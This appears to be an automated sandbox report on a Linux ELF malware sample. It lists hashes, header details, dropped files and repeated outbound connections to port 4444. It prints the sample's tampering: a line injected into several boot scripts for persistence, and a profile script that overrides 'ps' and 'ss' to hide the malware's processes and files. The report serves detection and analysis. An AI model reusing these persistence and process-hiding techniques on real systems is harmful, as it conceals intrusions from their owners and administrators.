Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Provides: unattended-upgrade-shutdown-check.# Default-Start: 2 3 4 5.# Default-Stop: 0 6.# Short-Description: Check if unattended upgrades are being applied.# Description: Check if unattended upgrades are being applied.# and wait for them to finish.### END INIT INFO.set -e..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..NAME="unattended-upgrades-shutdown".DESC="unattended package upgrades shutdown".SCRIPTNAME="/etc/init.d/$NAME".SHUTDOWN_HELPER="/usr/share/unattended-upgrades/unattended-upgrade-shutdown"..if [ -x /usr/bin/python3 ]; then./lib/system.mark. PYTHON=python3.else. PYTHON=python.fi..# Load the VERBOSE setting and other rcS variables.. /lib/init/vars.sh..# Define LSB log_* functions..# Depend on lsb-base (>= 3.2-14) to ensure that this file is present.. /lib/lsb/init-functions..case "$1" in.

/etc/init.d/uuidd

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1358
Entropy (8bit):	5.2132074992430075
Encrypted:	false
SSDEEP:	24:aNmC4ozLk8BZa8LNfwa0dDEPLu5CB5ZM51Hdwi/DqT0KtOC:3VozBjdh0d4PLuIBvMNwiuIKtl
MD5:	4A25430D50590B5FD530703742868720
SHA1:	FB4D80FD6B01795838C4D0A49B1467910FF3FB4D
SHA-256:	0CE2C7B3FEA143F8855B7BE493906899F6CAFC7D9558AB315D10E62CAF59AC61
SHA-512:	15375558913D6AF219281A08A470F8BEBC4B729119DC317D9FBFE60892F9CB76AD9BF8704BC0CE7FB3BF5EFA3BE279021EC8000AF4AB3E4034D0CE67C12F91D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh -e.### BEGIN INIT INFO.# Provides: uuidd.# Required-Start: $time $local_fs $remote_fs.# Required-Stop: $time $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: uuidd daemon.# Description: Init script for the uuid generation daemon.### END INIT INFO.#.# Author:."Theodore Ts'o" <tytso@mit.edu>.#.set -e..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DAEMON=/usr/sbin/uuidd.UUIDD_USER=uuidd.UUIDD_GROUP=uuidd.UUIDD_DIR=/run/uuidd.PIDFILE=$UUIDD_DIR/uuidd.pid..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..case "$1" in. start)..log_daemon_msg "Starting uuid generator" "uuidd"..if ! test -d $UUIDD_DIR; then./lib/system.mark...mkdir -p $UUIDD_DIR...chown -R $UUIDD_USER:$UUIDD_GROUP $UUIDD_DIR..fi..start_daemon -p $PIDFILE $DAEMON..log_end_msg $?. ;;. stop)..log_daemon_msg "Stopping uuid generator" "uuidd"..killproc -p $PIDFILE $DAEMON..log_end_msg $?. ;;. status)..if pidofproc -p $PIDFILE $DAEMON >/dev/null 2>&

/etc/init.d/x11-common

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2911
Entropy (8bit):	4.896684913637708
Encrypted:	false
SSDEEP:	48:ZETjwC4gFkV8ZSVwxPRyye1vrBy9DuIpPX5uCXAepm1L+/WAhtX76XGMgH3:SIgFkVlVY1IT09DuYX5HX3aidOX8
MD5:	ED4AAC2A7BFA47958A11198C382AF668
SHA1:	3646EAC456824AA2D579E5E66F8050CC886C44E7
SHA-256:	8D107A508429EC4AE1049F1BB79260CC2B4E10EDB952DC764FB4ED7979A409AC
SHA-512:	AAA3B8EC1B82F46E3FA10ADDF3BB9B7E4FC93B9B575BCD5D4BCE712F17117F10059BF0A0E827982B613422E8FE009F31B8ED68B3B9F4EF2202A73E155CDD4279
Malicious:	true
Preview:	#!/bin/sh.# /etc/init.d/x11-common: set up the X server and ICE socket directories.### BEGIN INIT INFO.# Provides: x11-common.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: set up the X server and ICE socket directories.### END INIT INFO..set -e..PATH=/usr/bin:/usr/sbin:/bin:/sbin.SOCKET_DIR=.X11-unix.ICE_DIR=.ICE-unix... /lib/lsb/init-functions.if [ -f /etc/default/rcS ]; then./lib/system.mark. . /etc/default/rcS.fi..do_restorecon () {. # Restore file security context (SELinux).. if which restorecon >/dev/null 2>&1; then./lib/system.mark. restorecon "$1". fi.}..# create a directory in /tmp..# assumes /tmp has a sticky bit set (or is only writeable by root).set_up_dir () {. DIR="/tmp/$1".. if [ "$VERBOSE" != no ]; then./lib/system.mark. log_progress_msg "$DIR". fi. # if $DIR exists and isn't a directory, move it aside. if [ -e $DIR ] && ! [ -d $DIR ] \|\| [ -h $DIR ]; then./lib/system.mar

/etc/profile.d/bash.cfg.sh

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.204582217613529
Encrypted:	false
SSDEEP:	3:TKH/binKX:siKX
MD5:	5C67BC6A39813CE4346CB7CA206A9393
SHA1:	F99586987650CFA169F5110198CBDE17B82FD2BA
SHA-256:	29EC88CF1C7403CC92602408772AB2FCE6E26E10E29E0C19F6FCF03AC6E1B483
SHA-512:	BF8701863EB49B3552181620944D05C23C63762E386D6C353609DE3D71784CB87E054F279FE56A1C661C927813DEF4481586E3BC5C820D20DCEC7F3F891F2A8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash./etc/profile.d/bash.cfg

/etc/profile.d/gateway.sh

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	Bourne-Again shell script, ASCII text executable, with very long lines (705)
Category:	dropped
Size (bytes):	4904
Entropy (8bit):	4.841949294230104
Encrypted:	false
SSDEEP:	96:sSr2vBOPmf2/BSr2vBOPmf2/7Sr2vBOPmf2/PSr2vBOPmf2/BSr2vBOPmf2/RSrM:si2vBOPmf2/Bi2vBOPmf2/7i2vBOPmf4
MD5:	83C3DDCF2956E8B1914425F1F6737351
SHA1:	D03284448312043CE20FEA385BD16C1F503D2E4F
SHA-256:	E22DD9569C2F302A1210C78DEC23A83ABB0B1411AED0D9729F0CDD336541E917
SHA-512:	4B999503609B050E6327ADF55FA72BC528AC8467F8987D5000CA4BDD4EE660ABDDD573CF0B0CE4808E3434A2738A9B2F4620862C3E7E7C03E68CD09F3811D889
Malicious:	true
Preview:	#!/bin/bash.function ps { proc_name=$(/usr/bin/ps $@);proc_name=$(echo "$proc_name" \| sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" \| sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" \| sed -e '/system.pub/d');proc_name=$(echo "$proc_name" \| sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" \| sed -e '/.mod/d');proc_name=$(echo "$proc_name" \| sed -e '/libgdi.so.0.8.2/d');proc_name=$(echo "$proc_name" \| sed -e '/system.mark/d');proc_name=$(echo "$proc_name" \| sed -e '/netstat.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/bash.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/sBKWt6JPZa.elf/d');echo "$proc_name"; }.function ss { proc_name=$(/usr/bin/ss $@);proc_name=$(echo "$proc_name" \| sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" \| sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" \| sed -e '/system.pub/d');proc_name=$(

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/proc/5538/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/proc/5601/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/proc/5604/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/run/crond.pid

Download File

Process:	/usr/sbin/cron
File Type:	ASCII text
Category:	dropped
Size (bytes):	10
Entropy (8bit):	1.9219280948873623
Encrypted:	false
SSDEEP:	3:GX6n:GKn
MD5:	5982BF5E22F71BFD2EEE4C08A81CC06A
SHA1:	3B78220F78BA3BE17217C0B758383397B9757E91
SHA-256:	524E009375C76C743BAEA664659177E5A543AA141D781EF34C75B424F6F998C2
SHA-512:	35CD35B9130950CF41F1366C21223F37684BE615DFBC8B03024DFD21AD551456346F8EF1311438053339EF2C2DE2D9773A77E013CAF386A5659BCA80D4B0F6B8
Malicious:	false
Preview:	5625.5625.

Static File Info

General

File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Entropy (8bit):	7.9220511441366455
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	sBKWt6JPZa.elf
File size:	2'027'704 bytes
MD5:	63945044a721e944cfad5d1223a109d4
SHA1:	ad36f402f6ab4eadc0b7d2b264ea2e85f5ed295d
SHA256:	c58a9423d151407e4c432da5a28a4942a09030020fd89f1b7cc1f5bc569a2b60
SHA512:	bcf4528e9db8ef9f7cc14a9c7b2e59c356c30cb6a884a6ad2ea1126ca567af404661b37902fee3905843a751e11f456a4aabd406f57343c8cdbe7973dfbce359
SSDEEP:	49152:uep69Tp5D+H0U2vE6d8evX3YugL5jioIewEZq5BW:u19DD+H0rc6pv3YugL5F1wQq5o
TLSH:	DC953387D23824ADB6A78A5E41B9767DD0C57246E0F660314FD9A78BEB307D2C3E2047
File Content Preview:	.ELF..............>.....(.^.....@...................@.8...@.......................@.......@.....:.......:.......................pE......pE......pE..............................Q.td....................................................1.[.UPX!..........O...O

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x5ee828
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	3
Section Header Offset:	0
Section Header Size:	64
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align
LOAD	0x0	0x400000	0x400000	0x1ef03a	0x1ef03a	7.9221	0x5	R E	0x10000
LOAD	0x4570	0x934570	0x934570	0x0	0x0	0.0000	0x6	RW	0x1000
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x8

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 16, 2024 10:07:07.212302923 CEST	50706	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:07.217252970 CEST	4444	50706	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:07.217422962 CEST	50706	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:07.219485998 CEST	50706	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:07.224299908 CEST	4444	50706	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:07.891782999 CEST	4444	50706	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:07.894171000 CEST	50706	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:07.895324945 CEST	50706	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:07.896723032 CEST	50708	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:07.900130987 CEST	4444	50706	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:07.901562929 CEST	4444	50708	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:07.901657104 CEST	50708	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:07.903043985 CEST	50708	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:07.907968044 CEST	4444	50708	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:08.579917908 CEST	4444	50708	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:08.582143068 CEST	50708	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:08.582958937 CEST	50708	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:08.584328890 CEST	50710	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:08.587730885 CEST	4444	50708	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:08.589391947 CEST	4444	50710	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:08.589447021 CEST	50710	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:08.591110945 CEST	50710	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:08.595936060 CEST	4444	50710	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:09.476054907 CEST	4444	50710	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:09.478147984 CEST	50710	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:09.479381084 CEST	50710	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:09.480531931 CEST	50712	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:09.484226942 CEST	4444	50710	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:09.485344887 CEST	4444	50712	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:09.485397100 CEST	50712	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:09.486733913 CEST	50712	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:09.491717100 CEST	4444	50712	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:10.209084988 CEST	4444	50712	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:10.210123062 CEST	50712	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:10.211448908 CEST	50712	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:10.212487936 CEST	50714	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:10.216206074 CEST	4444	50712	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:10.217273951 CEST	4444	50714	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:10.217335939 CEST	50714	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:10.218909979 CEST	50714	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:10.223833084 CEST	4444	50714	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:10.900556087 CEST	4444	50714	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:10.902152061 CEST	50714	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:10.912408113 CEST	50714	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:10.913387060 CEST	50716	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:10.917279005 CEST	4444	50714	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:10.918243885 CEST	4444	50716	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:10.918306112 CEST	50716	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:10.920264006 CEST	50716	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:10.925246000 CEST	4444	50716	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:11.598366976 CEST	4444	50716	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:11.601433992 CEST	50716	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:11.602489948 CEST	50718	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:11.606486082 CEST	4444	50716	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:11.608097076 CEST	4444	50718	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:11.608165979 CEST	50718	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:11.609986067 CEST	50718	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:11.614842892 CEST	4444	50718	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:12.314430952 CEST	4444	50718	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:12.317243099 CEST	50718	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:12.318046093 CEST	50720	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:12.322082043 CEST	4444	50718	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:12.322880030 CEST	4444	50720	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:12.322928905 CEST	50720	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:12.324214935 CEST	50720	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:12.329087973 CEST	4444	50720	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:27.550210953 CEST	50720	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:27.557015896 CEST	4444	50720	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:36.950192928 CEST	4444	50720	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:36.954137087 CEST	50720	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:36.954396009 CEST	50720	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:36.956096888 CEST	50722	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:36.959274054 CEST	4444	50720	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:36.961132050 CEST	4444	50722	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:36.961241007 CEST	50722	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:36.964529991 CEST	50722	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:36.969446898 CEST	4444	50722	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:37.714745998 CEST	4444	50722	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:37.717906952 CEST	50722	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:37.719290018 CEST	50724	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:37.722845078 CEST	4444	50722	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:37.724344969 CEST	4444	50724	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:37.724450111 CEST	50724	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:37.726954937 CEST	50724	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:37.731906891 CEST	4444	50724	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:38.487663031 CEST	4444	50724	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:38.490287066 CEST	50724	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:38.490598917 CEST	50724	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:38.491775990 CEST	50726	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:38.495640993 CEST	4444	50724	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:38.496721029 CEST	4444	50726	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:38.496823072 CEST	50726	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:38.499233961 CEST	50726	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:38.504208088 CEST	4444	50726	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:39.241727114 CEST	4444	50726	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:39.242173910 CEST	50726	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:39.245066881 CEST	50726	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:39.246237040 CEST	50728	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:39.250000954 CEST	4444	50726	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:39.251115084 CEST	4444	50728	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:39.251211882 CEST	50728	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:39.253575087 CEST	50728	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:39.258517981 CEST	4444	50728	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:40.005702019 CEST	4444	50728	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:40.006165981 CEST	50728	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:40.008538008 CEST	50728	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:40.009732962 CEST	50730	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:40.013595104 CEST	4444	50728	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:40.014687061 CEST	4444	50730	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:40.014754057 CEST	50730	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:40.016448021 CEST	50730	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:40.021311998 CEST	4444	50730	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:40.752027988 CEST	4444	50730	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:40.754149914 CEST	50730	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:40.755409956 CEST	50730	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:40.756766081 CEST	50732	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:40.763118982 CEST	4444	50730	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:40.765229940 CEST	4444	50732	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:40.765361071 CEST	50732	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:40.767872095 CEST	50732	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:40.774296045 CEST	4444	50732	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:41.507066965 CEST	4444	50732	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:41.509881973 CEST	50732	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:41.510564089 CEST	50734	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:41.516642094 CEST	4444	50732	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:41.516786098 CEST	4444	50734	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:41.516861916 CEST	50734	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:41.518403053 CEST	50734	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:41.525491953 CEST	4444	50734	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:42.278095007 CEST	4444	50734	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:42.280709982 CEST	50734	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:42.281687021 CEST	50736	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:42.286343098 CEST	4444	50734	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:42.287223101 CEST	4444	50736	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:42.287298918 CEST	50736	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:42.289361954 CEST	50736	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:42.294805050 CEST	4444	50736	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:43.060868979 CEST	4444	50736	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:43.062210083 CEST	50736	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:43.063838005 CEST	50736	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:43.065073013 CEST	50738	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:43.068665028 CEST	4444	50736	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:43.069951057 CEST	4444	50738	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:43.070105076 CEST	50738	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:43.072382927 CEST	50738	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:43.077188969 CEST	4444	50738	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:44.179440975 CEST	4444	50738	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:44.182173014 CEST	50738	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:44.182440996 CEST	50738	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:44.183558941 CEST	50740	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:44.187313080 CEST	4444	50738	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:44.188469887 CEST	4444	50740	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:44.188565969 CEST	50740	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:44.190809965 CEST	50740	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:44.195688009 CEST	4444	50740	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:44.930289030 CEST	4444	50740	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:44.933283091 CEST	50740	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:44.934397936 CEST	50742	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:44.938373089 CEST	4444	50740	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:44.939291954 CEST	4444	50742	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:44.939403057 CEST	50742	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:44.941575050 CEST	50742	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:44.946497917 CEST	4444	50742	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:45.681958914 CEST	4444	50742	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:45.682168961 CEST	50742	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:45.684102058 CEST	50742	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:45.684823990 CEST	50744	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:45.688950062 CEST	4444	50742	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:45.689789057 CEST	4444	50744	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:45.689882994 CEST	50744	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:45.691545963 CEST	50744	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:45.696445942 CEST	4444	50744	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:46.433196068 CEST	4444	50744	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:46.434158087 CEST	50744	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:46.435369968 CEST	50744	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:46.436069012 CEST	50746	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:46.440360069 CEST	4444	50744	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:46.441070080 CEST	4444	50746	27.30.77.93	192.168.2.13
Oct 16, 2024 10:07:46.441175938 CEST	50746	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:46.442714930 CEST	50746	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:07:46.447640896 CEST	4444	50746	27.30.77.93	192.168.2.13
